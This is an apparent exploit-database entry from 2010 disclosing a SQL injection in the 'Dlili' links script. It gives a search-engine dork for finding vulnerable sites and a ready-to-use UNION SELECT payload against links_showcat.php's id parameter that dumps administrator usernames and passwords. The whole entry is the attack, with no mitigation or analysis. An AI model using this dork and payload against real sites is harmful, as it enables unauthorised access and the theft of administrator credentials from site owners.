id: 10756
date: 02/02/2010
title: Dlili Script SQL Injection Vulnerability
author: Dr.DaShEr
cves: 

========================================
Dlili Script SQL Injection Vulnerability
========================================

  

    [+] Script:              [ dlili ]
    [+] Script site:         [ http://www.dlili.com ]
########################################################################
 
 
   [+] Dork: inurl:"links_showcat.php?"
 
 
   =[ Exploit ]=
 
   [+] links_showcat.php?id=2 and 1=0 UNION SELECT 1,concat(username,0x3a,password),3,4 from admin
 
 
   [-] SQLi p0c:
 
   [+] http://server[path]/links_showcat.php?id=2 and 1=0 UNION SELECT 1,concat(username,0x3a,password),3,4 from admin
 
 
  ###########################################################################



#  0day.today [2023-03-27]  #